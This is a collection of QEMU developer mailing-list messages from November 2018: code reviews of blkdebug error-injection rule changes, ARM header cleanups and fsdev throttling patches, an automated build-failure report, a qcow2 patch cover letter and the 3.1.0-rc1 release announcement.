>>> +    sector = qemu_opt_get_number(opts, "sector", -1);
>>> +    rule->offset = sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
>>> +
>>>   /* Parse action-specific options */
>>>   switch (d->action) {
>>>   case ACTION_INJECT_ERROR:
>>> -    rule->options.inject.error = qemu_opt_get_number(opts,
>>> "errno", EIO);
>>> -    rule->options.inject.once  = qemu_opt_get_bool(opts, "once",
>>> 0);
>>> -    rule->options.inject.immediately =
>>> +    rule->options.inject_error.error = qemu_opt_get_number(opts,
>>> "errno", EIO);
>>> +    rule->options.inject_error.immediately =
>>>   qemu_opt_get_bool(opts, "immediately", 0);
>>> -    sector = qemu_opt_get_number(opts, "sector", -1);
>>> -    rule->options.inject.offset =
>>> -    sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
>>>   break;
>>>     case ACTION_SET_STATE:
>>> @@ -474,38 +474,41 @@ static int rule_check(BlockDriverState *bs,
>>> uint64_t offset, uint64_t bytes)
>>>   {
>>>   BDRVBlkdebugState *s = bs->opaque;
>>>   BlkdebugRule *rule = NULL;
>>> +    BlkdebugRule *error_rule = NULL;
>>>   int error;
>>>   bool immediately;
>>> +    int ret = 0;
>>>     QSIMPLEQ_FOREACH(rule, >active_rules, active_next) {
>>> -    uint64_t inject_offset = rule->options.inject.offset;
>>> -
>>> -    if (inject_offset == -1 ||
>>> -    (bytes && inject_offset >= offset &&
>>> - inject_offset < offset + bytes))
>>> +    if (rule->offset == -1 ||
>>> +    (bytes && rule->offset >= offset &&
>>> + rule->offset < offset + bytes))
>>>   {
>>> -    break;
>>> +    if (rule->action == ACTION_INJECT_ERROR) {
>>> +    error_rule = rule;
>>> +    break;
>>> +    }
>>>   }
>>>   }
>>>   -    if (!rule) {
>>> -    return 0;
>>> -    }
>>> +    if (error_rule) {
>>> +    immediately = error_rule->options.inject_error.immediately;
>>> +    error = error_rule->options.inject_error.error;
>>>   -    immediately = rule->options.inject.immediately;
>>> -    error = rule->options.inject.error;
>>> +    if (error_rule->once) {
>>> +    QSIMPLEQ_REMOVE(>active_rules, error_rule,
>>> BlkdebugRule, active_next);
>>> +    remove_rule(error_rule);
>>> +    }
>>>   -    if (rule->options.inject.once) {
>>> -    QSIMPLEQ_REMOVE(>active_rules, rule, BlkdebugRule,
>>> active_next);
>>> -    remove_rule(rule);
>>> -    }
>>> +    if (error && !immediately) {
>>> +    aio_co_schedule(qemu_get_current_aio_context(),
>>> qemu_coroutine_self());
>>> +    qemu_coroutine_yield();
>>> +    }
>>>   -    if (error && !immediately) {
>>> -    aio_co_schedule(qemu_get_current_aio_context(),
>>> qemu_coroutine_self());
>>> -    qemu_coroutine_yield();
>>> +    ret = -error;
>>>   }
>> Bit messy as a diff, but it seems to check out. As a bonus we now
>> actually check the tag of 

Re: [Qemu-devel] [PATCH v3 2/3] blkdebug: Extend rule check for additional types

[Marc Olson via Qemu-devel]

On 11/13/18 3:22 PM, John Snow wrote:


On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:

Break out the more common parts of the BlkdebugRule struct, and make
rule_check() more explicit about operating only on error injection types
so that additional rule types can be added in the future.

Signed-off-by: Marc Olson 
---
  block/blkdebug.c | 59 +---
  1 file changed, 31 insertions(+), 28 deletions(-)

diff --git a/block/blkdebug.c b/block/blkdebug.c
index 327049b..7739849 100644
--- a/block/blkdebug.c
+++ b/block/blkdebug.c
@@ -73,13 +73,13 @@ typedef struct BlkdebugRule {
  BlkdebugEvent event;
  int action;
  int state;
+int once;
+int64_t offset;
  union {
  struct {
  int error;
  int immediately;
-int once;
-int64_t offset;
-} inject;
+} inject_error;

...pulling out "once" and "offset" from inject_error (renamed inject) to
shared properties. Fine, though this looks like it could use more love.
Not your doing.

This adds new dead fields for set_state and suspend which will now work,
but hopefully not do anything.



I think set_state was already there?




  struct {
  int new_state;
  } set_state;
@@ -182,16 +182,16 @@ static int add_rule(void *opaque, QemuOpts *opts, Error 
**errp)
  .state  = qemu_opt_get_number(opts, "state", 0),
  };
  
+rule->once = qemu_opt_get_bool(opts, "once", 0);

+sector = qemu_opt_get_number(opts, "sector", -1);
+rule->offset = sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
+
  /* Parse action-specific options */
  switch (d->action) {
  case ACTION_INJECT_ERROR:
-rule->options.inject.error = qemu_opt_get_number(opts, "errno", EIO);
-rule->options.inject.once  = qemu_opt_get_bool(opts, "once", 0);
-rule->options.inject.immediately =
+rule->options.inject_error.error = qemu_opt_get_number(opts, "errno", 
EIO);
+rule->options.inject_error.immediately =
  qemu_opt_get_bool(opts, "immediately", 0);
-sector = qemu_opt_get_number(opts, "sector", -1);
-rule->options.inject.offset =
-sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
  break;
  
  case ACTION_SET_STATE:

@@ -474,38 +474,41 @@ static int rule_check(BlockDriverState *bs, uint64_t 
offset, uint64_t bytes)
  {
  BDRVBlkdebugState *s = bs->opaque;
  BlkdebugRule *rule = NULL;
+BlkdebugRule *error_rule = NULL;
  int error;
  bool immediately;
+int ret = 0;
  
  QSIMPLEQ_FOREACH(rule, >active_rules, active_next) {

-uint64_t inject_offset = rule->options.inject.offset;
-
-if (inject_offset == -1 ||
-(bytes && inject_offset >= offset &&
- inject_offset < offset + bytes))
+if (rule->offset == -1 ||
+(bytes && rule->offset >= offset &&
+ rule->offset < offset + bytes))
  {
-break;
+if (rule->action == ACTION_INJECT_ERROR) {
+error_rule = rule;
+break;
+}
  }
  }
  
-if (!rule) {

-return 0;
-}
+if (error_rule) {
+immediately = error_rule->options.inject_error.immediately;
+error = error_rule->options.inject_error.error;
  
-immediately = rule->options.inject.immediately;

-error = rule->options.inject.error;
+if (error_rule->once) {
+QSIMPLEQ_REMOVE(>active_rules, error_rule, BlkdebugRule, 
active_next);
+remove_rule(error_rule);
+}
  
-if (rule->options.inject.once) {

-QSIMPLEQ_REMOVE(>active_rules, rule, BlkdebugRule, active_next);
-remove_rule(rule);
-}
+if (error && !immediately) {
+aio_co_schedule(qemu_get_current_aio_context(), 
qemu_coroutine_self());
+qemu_coroutine_yield();
+}
  
-if (error && !immediately) {

-aio_co_schedule(qemu_get_current_aio_context(), qemu_coroutine_self());
-qemu_coroutine_yield();
+ret = -error;
  }

Bit messy as a diff, but it seems to check out. As a bonus we now
actually check the tag of the rules we're iterating through, so that
seems like an improvement.



Unfortunately git made a bit of a mess out of the diff.



Reviewed-By: John Snow 

  
-return -error;

+return ret;
  }
  
  static int coroutine_fn

Re: [Qemu-devel] [PATCH 01/13] target: arm: Add copyright boilerplate

[Samuel Ortiz]

On Tue, Nov 13, 2018 at 04:58:40PM +, Peter Maydell wrote:
> On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
> > From: Philippe Mathieu-Daudé 
> >
> > Signed-off-by: Philippe Mathieu-Daudé 
> > Reviewed-by: Robert Bradford 
> > Reviewed-by: Samuel Ortiz 
> > ---
> >  target/arm/helper.c | 7 +++
> >  1 file changed, 7 insertions(+)
> >
> > diff --git a/target/arm/helper.c b/target/arm/helper.c
> > index 0da1424f72..3d4e9c5c8a 100644
> > --- a/target/arm/helper.c
> > +++ b/target/arm/helper.c
> > @@ -1,3 +1,10 @@
> > +/*
> > + * ARM generic helpers.
> > + *
> > + * This code is licensed under the GNU GPL v2.
> > + *
> > + * SPDX-License-Identifier: GPL-2.0-or-later
> > + */
> 
> The human readable text says "v2", but the SPDX tag says
> "v2 or later". Which is right? (The top level LICENSE file says
> source files with no specific license are 2-or-later).
Fixed in my
https://github.com/intel/nemu/tree/topic/upstream/arm-tcg-disable
branch, thanks.

Cheers,
Samuel.

Re: [Qemu-devel] [PATCH 02/13] target: arm: Remove unused headers

[Samuel Ortiz]

Hi Philippe,

On Tue, Nov 13, 2018 at 07:02:57PM +0100, Philippe Mathieu-Daudé wrote:
> On 13/11/18 18:01, Peter Maydell wrote:
> > On 13 November 2018 at 16:52, Samuel Ortiz  wrote:
> > > From: Philippe Mathieu-Daudé 
> > > 
> > > Signed-off-by: Philippe Mathieu-Daudé 
> > > Reviewed-by: Robert Bradford 
> > > Reviewed-by: Samuel Ortiz 
> > > ---
> > >   target/arm/helper.c | 3 ---
> > >   1 file changed, 3 deletions(-)
> > > 
> > > diff --git a/target/arm/helper.c b/target/arm/helper.c
> > > index 3d4e9c5c8a..27d9285e1e 100644
> > > --- a/target/arm/helper.c
> > > +++ b/target/arm/helper.c
> > > @@ -12,13 +12,10 @@
> > >   #include "internals.h"
> > >   #include "exec/gdbstub.h"
> > >   #include "exec/helper-proto.h"
> > > -#include "qemu/host-utils.h"
> > 
> > This is for muldiv64().
> 
> But it is already included by "cpu.h" -> "exec/cpu-defs.h"
> 
> > 
> > >   #include "sysemu/arch_init.h"
> > >   #include "sysemu/sysemu.h"
> > > -#include "qemu/bitops.h"
> 
> "cpu.h" -> "cpu-qom.h" -> "qom/cpu.h" -> "qemu/bitmap.h"
> 
> > 
> > This is for extract32() and friends.
> > 
> > >   #include "qemu/crc32c.h"
> > >   #include "exec/exec-all.h"
> > > -#include "exec/cpu_ldst.h"
> > 
> > This is for cpu_stl_data().
> 
> Included by "arm_ldst.h"
> 
> > 
> > >   #include "arm_ldst.h"
> > >   #include  /* For crc32 */
> > >   #include "exec/semihost.h"
> 
> So they are not "unused" but "unnecessary".
> 
> I thought this would be better to clean this once, before Samuel split.
> 
> Samuel: please drop this patch from your series.
Dropped. I updated my
https://github.com/intel/nemu/tree/topic/upstream/arm-tcg-disable branch
accordingly. I will wait for Richard's review before sending a v2.

Cheers,
Samuel.

Re: [Qemu-devel] [PATCH v2 1/3] fsdev-throttle-qmp: refactor code for qmp interface for io throttling

[Eric Blake]

On 11/13/18 6:12 AM, xiezhide wrote:

This patch includes two parts:
1. factor out throttle code to reuse code
2. use ThrottleLimits structure


Any time your patch mentions two independent things, you have to ask if 
that can be two independent patches.  It's fine if they are to 
intertwined to separate, but giving more justification never hurts.




Signed-off-by: xiezhide 
---
  Makefile|  20 +++-
  Makefile.objs   |   8 ++
  block/throttle.c|   6 +-
  blockdev.c  |  96 +
  include/qemu/throttle-options.h |   3 +-
  include/qemu/throttle.h |   4 +-
  include/qemu/typedefs.h |   1 +
  qapi/block-core.json| 122 +-
  qapi/fsdev.json |  20 
  qapi/qapi-schema.json   |   1 +
  qapi/tlimits.json   |  89 
  util/throttle.c | 224 ++--
  12 files changed, 298 insertions(+), 296 deletions(-)
  create mode 100644 qapi/fsdev.json
  create mode 100644 qapi/tlimits.json


Still feels big; I don't know if it can be easily split into 
easier-to-manage patches, but it may be worth the effort.  For example, 
why are you adding both fsdev.json AND tlimits.json in the same patch?




diff --git a/Makefile b/Makefile
index f294718..9ae2460 100644
--- a/Makefile
+++ b/Makefile
@@ -94,6 +94,7 @@ GENERATED_FILES += qapi/qapi-types-block-core.h 
qapi/qapi-types-block-core.c
  GENERATED_FILES += qapi/qapi-types-block.h qapi/qapi-types-block.c
  GENERATED_FILES += qapi/qapi-types-char.h qapi/qapi-types-char.c
  GENERATED_FILES += qapi/qapi-types-common.h qapi/qapi-types-common.c
+GENERATED_FILES += qapi/qapi-types-tlimits.h qapi/qapi-types-tlimits.c
  GENERATED_FILES += qapi/qapi-types-crypto.h qapi/qapi-types-crypto.c
  GENERATED_FILES += qapi/qapi-types-introspect.h qapi/qapi-types-introspect.c
  GENERATED_FILES += qapi/qapi-types-job.h qapi/qapi-types-job.c


[Hmm - ages ago, I threatened to refactor this so there was a lot less 
manual duplication when adding a new file. I should return to that thread]


Please keep this list quasi-sorted (tlimits does NOT fall between common 
and crypto, but later in the list).



@@ -107,12 +108,14 @@ GENERATED_FILES += qapi/qapi-types-tpm.h 
qapi/qapi-types-tpm.c
  GENERATED_FILES += qapi/qapi-types-trace.h qapi/qapi-types-trace.c
  GENERATED_FILES += qapi/qapi-types-transaction.h qapi/qapi-types-transaction.c
  GENERATED_FILES += qapi/qapi-types-ui.h qapi/qapi-types-ui.c
+GENERATED_FILES += qapi/qapi-types-fsdev.h qapi/qapi-types-fsdev.c


Likewise, fsdev should appear earlier, way before ui.



@@ -598,7 +606,9 @@ qapi-modules = $(SRC_PATH)/qapi/qapi-schema.json 
$(SRC_PATH)/qapi/common.json \
 $(SRC_PATH)/qapi/tpm.json \
 $(SRC_PATH)/qapi/trace.json \
 $(SRC_PATH)/qapi/transaction.json \
-   $(SRC_PATH)/qapi/ui.json
+   $(SRC_PATH)/qapi/ui.json \
+   $(SRC_PATH)/qapi/fsdev.json \
+   $(SRC_PATH)/qapi/tlimits.json


Another sorted list that you managed to scramble.


+++ b/Makefile.objs
@@ -8,6 +8,7 @@ util-obj-y += qapi/qapi-types-block-core.o
  util-obj-y += qapi/qapi-types-block.o
  util-obj-y += qapi/qapi-types-char.o
  util-obj-y += qapi/qapi-types-common.o
+util-obj-y += qapi/qapi-types-tlimits.o
  util-obj-y += qapi/qapi-types-crypto.o


And more instances of poor sorting.


+++ b/block/throttle.c
@@ -41,7 +41,7 @@ static QemuOptsList throttle_opts = {
   * @group and must be freed by the caller.
   * If there's an error then @group remains unmodified.
   */
-static int throttle_parse_options(QDict *options, char **group, Error **errp)
+static int throttle_parse_group(QDict *options, char **group, Error **errp)


Why the function rename? Can that be its own patch?


+++ b/blockdev.c
@@ -400,48 +400,7 @@ static void extract_common_blockdev_options(QemuOpts 
*opts, int *bdrv_flags,
  }
  
  if (throttle_cfg) {

-throttle_config_init(throttle_cfg);
-throttle_cfg->buckets[THROTTLE_BPS_TOTAL].avg =
-qemu_opt_get_number(opts, "throttling.bps-total", 0);



-throttle_cfg->op_size =
-qemu_opt_get_number(opts, "throttling.iops-size", 0);
+throttle_parse_options(throttle_cfg, opts);


Okay, here, it looks like you are doing a code motion refactor - taking 
lots of lines of code, and putting them in a new function 
throttle_parse_options.  If that's all the patch does, great; but when 
it starts to mix in other things, it is hard to review.


  
  if (!throttle_is_valid(throttle_cfg, errp)) {

  return;
@@ -2725,6 +2684,7 @@ void qmp_block_set_io_throttle(BlockIOThrottle *arg, 
Error **errp)
  BlockDriverState *bs;
  BlockBackend *blk;
  AioContext *aio_context;
+ThrottleLimits *tlimits;


Do you need this new variable, or...


@@ -2742,56 +2702,8 @@ 

Re: [Qemu-devel] [PATCH v3 2/3] blkdebug: Extend rule check for additional types

[John Snow]

On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:
> Break out the more common parts of the BlkdebugRule struct, and make
> rule_check() more explicit about operating only on error injection types
> so that additional rule types can be added in the future.
> 
> Signed-off-by: Marc Olson 
> ---
>  block/blkdebug.c | 59 
> +---
>  1 file changed, 31 insertions(+), 28 deletions(-)
> 
> diff --git a/block/blkdebug.c b/block/blkdebug.c
> index 327049b..7739849 100644
> --- a/block/blkdebug.c
> +++ b/block/blkdebug.c
> @@ -73,13 +73,13 @@ typedef struct BlkdebugRule {
>  BlkdebugEvent event;
>  int action;
>  int state;
> +int once;
> +int64_t offset;
>  union {
>  struct {
>  int error;
>  int immediately;
> -int once;
> -int64_t offset;
> -} inject;
> +} inject_error;

...pulling out "once" and "offset" from inject_error (renamed inject) to
shared properties. Fine, though this looks like it could use more love.
Not your doing.

This adds new dead fields for set_state and suspend which will now work,
but hopefully not do anything.

>  struct {
>  int new_state;
>  } set_state;
> @@ -182,16 +182,16 @@ static int add_rule(void *opaque, QemuOpts *opts, Error 
> **errp)
>  .state  = qemu_opt_get_number(opts, "state", 0),
>  };
>  
> +rule->once = qemu_opt_get_bool(opts, "once", 0);
> +sector = qemu_opt_get_number(opts, "sector", -1);
> +rule->offset = sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
> +
>  /* Parse action-specific options */
>  switch (d->action) {
>  case ACTION_INJECT_ERROR:
> -rule->options.inject.error = qemu_opt_get_number(opts, "errno", EIO);
> -rule->options.inject.once  = qemu_opt_get_bool(opts, "once", 0);
> -rule->options.inject.immediately =
> +rule->options.inject_error.error = qemu_opt_get_number(opts, 
> "errno", EIO);
> +rule->options.inject_error.immediately =
>  qemu_opt_get_bool(opts, "immediately", 0);
> -sector = qemu_opt_get_number(opts, "sector", -1);
> -rule->options.inject.offset =
> -sector == -1 ? -1 : sector * BDRV_SECTOR_SIZE;
>  break;
>  
>  case ACTION_SET_STATE:
> @@ -474,38 +474,41 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  {
>  BDRVBlkdebugState *s = bs->opaque;
>  BlkdebugRule *rule = NULL;
> +BlkdebugRule *error_rule = NULL;
>  int error;
>  bool immediately;
> +int ret = 0;
>  
>  QSIMPLEQ_FOREACH(rule, >active_rules, active_next) {
> -uint64_t inject_offset = rule->options.inject.offset;
> -
> -if (inject_offset == -1 ||
> -(bytes && inject_offset >= offset &&
> - inject_offset < offset + bytes))
> +if (rule->offset == -1 ||
> +(bytes && rule->offset >= offset &&
> + rule->offset < offset + bytes))
>  {
> -break;
> +if (rule->action == ACTION_INJECT_ERROR) {
> +error_rule = rule;
> +break;
> +}
>  }
>  }
>  
> -if (!rule) {
> -return 0;
> -}
> +if (error_rule) {
> +immediately = error_rule->options.inject_error.immediately;
> +error = error_rule->options.inject_error.error;
>  
> -immediately = rule->options.inject.immediately;
> -error = rule->options.inject.error;
> +if (error_rule->once) {
> +QSIMPLEQ_REMOVE(>active_rules, error_rule, BlkdebugRule, 
> active_next);
> +remove_rule(error_rule);
> +}
>  
> -if (rule->options.inject.once) {
> -QSIMPLEQ_REMOVE(>active_rules, rule, BlkdebugRule, active_next);
> -remove_rule(rule);
> -}
> +if (error && !immediately) {
> +aio_co_schedule(qemu_get_current_aio_context(), 
> qemu_coroutine_self());
> +qemu_coroutine_yield();
> +}
>  
> -if (error && !immediately) {
> -aio_co_schedule(qemu_get_current_aio_context(), 
> qemu_coroutine_self());
> -qemu_coroutine_yield();
> +ret = -error;
>  }

Bit messy as a diff, but it seems to check out. As a bonus we now
actually check the tag of the rules we're iterating through, so that
seems like an improvement.

Reviewed-By: John Snow 

>  
> -return -error;
> +return ret;
>  }
>  
>  static int coroutine_fn
> 

Re: [Qemu-devel] [PATCH v2 0/3] fsdev-throttle-qmp: qmp interface for fsdev io throttling

[no-reply]

Hi,

This series failed docker-quick@centos7 build test. Please find the testing 
commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

Type: series
Message-id: cover.1542110461.git.xiezh...@huawei.com
Subject: [Qemu-devel] [PATCH v2 0/3] fsdev-throttle-qmp: qmp interface for 
fsdev io throttling

=== TEST SCRIPT BEGIN ===
#!/bin/bash
time make docker-test-quick@centos7 SHOW_ENV=1 J=8
=== TEST SCRIPT END ===

Updating 3c8cf5a9c21ff8782164d1def7f44bd888713384
Switched to a new branch 'test'
fa53c78941 fsdev-throttle-qmp: hmp interface for fsdev io throttling
468c324722 fsdev-throttle-qmp: qmp interface for fsdev io throttling
e0698a59db fsdev-throttle-qmp: refactor code for qmp interface for io throttling

=== OUTPUT BEGIN ===
  BUILD   centos7
make[1]: Entering directory '/var/tmp/patchew-tester-tmp-iuk2n7nv/src'
  GEN 
/var/tmp/patchew-tester-tmp-iuk2n7nv/src/docker-src.2018-11-13-17.53.03.16071/qemu.tar
Cloning into 
'/var/tmp/patchew-tester-tmp-iuk2n7nv/src/docker-src.2018-11-13-17.53.03.16071/qemu.tar.vroot'...
done.
Checking out files:  45% (2965/6457)   
Checking out files:  46% (2971/6457)   
Checking out files:  47% (3035/6457)   
Checking out files:  48% (3100/6457)   
Checking out files:  49% (3164/6457)   
Checking out files:  50% (3229/6457)   
Checking out files:  51% (3294/6457)   
Checking out files:  52% (3358/6457)   
Checking out files:  53% (3423/6457)   
Checking out files:  54% (3487/6457)   
Checking out files:  55% (3552/6457)   
Checking out files:  56% (3616/6457)   
Checking out files:  57% (3681/6457)   
Checking out files:  58% (3746/6457)   
Checking out files:  59% (3810/6457)   
Checking out files:  60% (3875/6457)   
Checking out files:  61% (3939/6457)   
Checking out files:  62% (4004/6457)   
Checking out files:  63% (4068/6457)   
Checking out files:  64% (4133/6457)   
Checking out files:  65% (4198/6457)   
Checking out files:  66% (4262/6457)   
Checking out files:  67% (4327/6457)   
Checking out files:  68% (4391/6457)   
Checking out files:  69% (4456/6457)   
Checking out files:  70% (4520/6457)   
Checking out files:  71% (4585/6457)   
Checking out files:  72% (4650/6457)   
Checking out files:  73% (4714/6457)   
Checking out files:  74% (4779/6457)   
Checking out files:  75% (4843/6457)   
Checking out files:  76% (4908/6457)   
Checking out files:  77% (4972/6457)   
Checking out files:  78% (5037/6457)   
Checking out files:  79% (5102/6457)   
Checking out files:  80% (5166/6457)   
Checking out files:  81% (5231/6457)   
Checking out files:  82% (5295/6457)   
Checking out files:  83% (5360/6457)   
Checking out files:  84% (5424/6457)   
Checking out files:  85% (5489/6457)   
Checking out files:  86% (5554/6457)   
Checking out files:  87% (5618/6457)   
Checking out files:  88% (5683/6457)   
Checking out files:  89% (5747/6457)   
Checking out files:  90% (5812/6457)   
Checking out files:  91% (5876/6457)   
Checking out files:  92% (5941/6457)   
Checking out files:  93% (6006/6457)   
Checking out files:  94% (6070/6457)   
Checking out files:  95% (6135/6457)   
Checking out files:  96% (6199/6457)   
Checking out files:  97% (6264/6457)   
Checking out files:  98% (6328/6457)   
Checking out files:  99% (6393/6457)   
Checking out files: 100% (6457/6457)   
Checking out files: 100% (6457/6457), done.
Your branch is up-to-date with 'origin/test'.
Submodule 'dtc' (https://git.qemu.org/git/dtc.git) registered for path 'dtc'
Cloning into 
'/var/tmp/patchew-tester-tmp-iuk2n7nv/src/docker-src.2018-11-13-17.53.03.16071/qemu.tar.vroot/dtc'...
Submodule path 'dtc': checked out '88f18909db731a627456f26d779445f84e449536'
Submodule 'ui/keycodemapdb' (https://git.qemu.org/git/keycodemapdb.git) 
registered for path 'ui/keycodemapdb'
Cloning into 
'/var/tmp/patchew-tester-tmp-iuk2n7nv/src/docker-src.2018-11-13-17.53.03.16071/qemu.tar.vroot/ui/keycodemapdb'...
Submodule path 'ui/keycodemapdb': checked out 
'6b3d716e2b6472eb7189d3220552280ef3d832ce'
  COPYRUNNER
RUN test-quick in qemu:centos7 
Packages installed:
SDL-devel-1.2.15-14.el7.x86_64
bison-3.0.4-1.el7.x86_64
bzip2-1.0.6-13.el7.x86_64
bzip2-devel-1.0.6-13.el7.x86_64
ccache-3.3.4-1.el7.x86_64
csnappy-devel-0-6.20150729gitd7bc683.el7.x86_64
flex-2.5.37-3.el7.x86_64
gcc-4.8.5-28.el7_5.1.x86_64
gettext-0.19.8.1-2.el7.x86_64
git-1.8.3.1-14.el7_5.x86_64
glib2-devel-2.54.2-2.el7.x86_64
libaio-devel-0.3.109-13.el7.x86_64
libepoxy-devel-1.3.1-2.el7_5.x86_64
libfdt-devel-1.4.6-1.el7.x86_64
lzo-devel-2.06-8.el7.x86_64
make-3.82-23.el7.x86_64
mesa-libEGL-devel-17.2.3-8.20171019.el7.x86_64
mesa-libgbm-devel-17.2.3-8.20171019.el7.x86_64
nettle-devel-2.7.1-8.el7.x86_64
package g++ is not installed
package librdmacm-devel is not installed
pixman-devel-0.34.0-1.el7.x86_64
spice-glib-devel-0.34-3.el7_5.1.x86_64
spice-server-devel-0.14.0-2.el7_5.4.x86_64
tar-1.26-34.el7.x86_64
vte-devel-0.28.2-10.el7.x86_64
xen-devel-4.6.6-12.el7.x86_64

Re: [Qemu-devel] [PATCH v3 1/3] blkdebug: fix one shot rule processing

[John Snow]

On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:
> If 'once' is specified, the rule should execute just once, regardless if
> it is supposed to return an error or not. Take the example where you
> want the first IO to an LBA to succeed, but subsequent IOs to fail. You
> could either use state transitions, or create two rules, one with
> error = 0 and once set to true, and one with a non-zero error.
> 
> Signed-off-by: Marc Olson 
> ---
>  block/blkdebug.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
> 
> diff --git a/block/blkdebug.c b/block/blkdebug.c
> index 0759452..327049b 100644
> --- a/block/blkdebug.c
> +++ b/block/blkdebug.c
> @@ -488,7 +488,7 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  }
>  }
>  
> -if (!rule || !rule->options.inject.error) {
> +if (!rule) {
>  return 0;
>  }
>  

This gets rid of the early return so that later we check to see if
'once' was set and remove the rule, regardless of if it did anything or not,

> @@ -500,7 +500,7 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  remove_rule(rule);
>  }
>  
> -if (!immediately) {
> +if (error && !immediately) {

And then we modify this to only trigger if we have an error to inject.

>  aio_co_schedule(qemu_get_current_aio_context(), 
> qemu_coroutine_self());
>  qemu_coroutine_yield();
>  }
> 

[down here, we return -error, but that should still be zero.]


This changes the mechanism of 'once' slightly, but only when errno was
set to zero. I'm not sure we make use of that anywhere, so I think this
should be a safe change. Certainly we don't stipulate that we only
respect once if you bothered to set errno to a non-zero value.

I thiink this is probably fine.

Reviewed-by: John Snow 

[Qemu-devel] [PATCH for 3.1 v3 0/3] minor qcow2 compression improvements

[Eric Blake]

As the added iotests shows, we have a (corner case) data corruption
that is user triggerable, therefore, this is still appropriate for
inclusion in 3.1.

v6 was here:
https://lists.gnu.org/archive/html/qemu-devel/2018-06/msg08497.html

since then:
- don't reduce constraints on reftable [Kevin]
- rebase to recent iotests changes
- drop patches that might conflict with Vladimir's work now on Kevin's
block-next branch

001/3:[0042] [FC] 'qcow2: Document some maximum size constraints'
002/3:[0003] [FC] 'qcow2: Don't allow overflow during cluster allocation'
003/3:[0003] [FC] 'iotests: Add new test 220 for max compressed cluster offset'

Eric Blake (3):
  qcow2: Document some maximum size constraints
  qcow2: Don't allow overflow during cluster allocation
  iotests: Add new test 220 for max compressed cluster offset

 docs/interop/qcow2.txt | 30 +++-
 block/qcow2.h  |  6 +++
 block/qcow2-refcount.c | 20 +---
 tests/qemu-iotests/220 | 96 ++
 tests/qemu-iotests/220.out | 54 +
 tests/qemu-iotests/group   |  1 +
 6 files changed, 198 insertions(+), 9 deletions(-)
 create mode 100755 tests/qemu-iotests/220
 create mode 100644 tests/qemu-iotests/220.out

-- 
2.17.2

[Qemu-devel] [ANNOUNCE] QEMU 3.1.0-rc1 is now available

[Michael Roth]

Hello,

On behalf of the QEMU Team, I'd like to announce the availability of the
second release candidate for the QEMU 3.1 release.  This release is meant
for testing purposes and should not be used in a production environment.

  http://download.qemu-project.org/qemu-3.1.0-rc1.tar.xz
  http://download.qemu-project.org/qemu-3.1.0-rc1.tar.xz.sig

You can help improve the quality of the QEMU 3.1 release by testing this
release and reporting bugs on Launchpad:

  https://bugs.launchpad.net/qemu/

The release plan, as well a documented known issues for release
candidates, are available at:

  http://wiki.qemu.org/Planning/3.1

Please add entries to the ChangeLog for the 3.1 release below:

  http://wiki.qemu.org/ChangeLog/3.1

Thank you to everyone involved!

Changes since rc0:

cb968d275c: Update version for v3.1.0-rc1 release (Peter Maydell)
436c0cbbeb: target/arm/cpu: Give Cortex-A15 and -A7 the EL2 feature (Peter 
Maydell)
593cfa2b63: target/arm: Hyp mode R14 is shared with User and System (Peter 
Maydell)
89430fc6f8: target/arm: Correctly implement handling of HCR_EL2.{VI, VF} (Peter 
Maydell)
ed89f078ff: target/arm: Track the state of our irq lines from the GIC 
explicitly (Peter Maydell)
c624ea0fa7: Revert "target/arm: Implement HCR.VI and VF" (Peter Maydell)
22af90255e: arm: fix aa64_generate_debug_exceptions to work with EL2 (Alex 
Bennée)
b281ba4223: arm: use symbolic MDCR_TDE in arm_debug_target_el (Alex Bennée)
f251cb2371: tests/guest-debug: fix scoping of failcount (Alex Bennée)
14f9a5c0e4: target/arm64: kvm debug set target_el when passing exception to 
guest (Alex Bennée)
9b16ec4351: target/arm64: hold BQL when calling do_interrupt() (Alex Bennée)
864df2058d: target/arm64: properly handle DBGVR RESS bits (Alex Bennée)
09a86dfa3f: target/arm: Fix typo in tlbi_aa64_vmalle1_write (Richard Henderson)
e9ac8e84f0: hw/arm/sysbus-fdt: Only call match_fn callback if the type matches 
(Eric Auger)
671f11b204: MAINTAINERS: Add an entry for the 'collie' machine (Thomas Huth)
e24ad48490: target/arm: Remove antique TODO comment (Peter Maydell)
521ed6b401: target/arm: Remove workaround for small SAU regions (Peter Maydell)
7cb6d3c9be: qcow2: Read outside array bounds in qcow2_pre_write_overlap_check() 
(Liam Merwick)
8d9401c279: block: Fix potential Null pointer dereferences in vvfat.c (Liam 
Merwick)
2e2db26009: qemu-img: assert block_job_get() does not return NULL in 
img_commit() (Liam Merwick)
602414d123: block: Null pointer dereference in blk_root_get_parent_desc() (Liam 
Merwick)
c2032289b0: job: Fix off-by-one assert checks for JobSTT and JobVerbTable (Liam 
Merwick)
2f74013655: block: Make more block drivers compile-time configurable (Jeff Cody)
aef96d7d4f: tests: Add unit tests for image locking (Fam Zheng)
f2e3af29b7: file-posix: Drop s->lock_fd (Fam Zheng)
2996ffad3a: file-posix: Skip effectiveless OFD lock operations (Fam Zheng)
a883d6a0bc: nvme: free cmbuf in nvme_exit (Li Qiang)
20faf0f5f8: nvme: don't unref ctrl_mem when device unrealized (Li Qiang)
d52e1a0e96: blockdev: Consistently use snapshot_node_name in 
external_snapshot_prepare() (Peter Maydell)
63d5341f85: blockdev: handle error on block latency histogram set error 
(zhenwei pi)
db0754df88: file-posix: Use error API properly (Fam Zheng)
113a9dd73f: linux-user: Add support for SO_REUSEPORT (Yunqiang Su)
435cc3e4d5: hw/acpi/nvdimm: Don't take address of fields in packed structs 
(Peter Maydell)
9f214bd390: linux-user: Clean up nios2 main loop signal handling (Peter Maydell)
b10089a14c: linux-user: Don't call gdb_handlesig() before queue_signal() (Peter 
Maydell)
e285977e77: linux-user: Remove dead error-checking code (Peter Maydell)
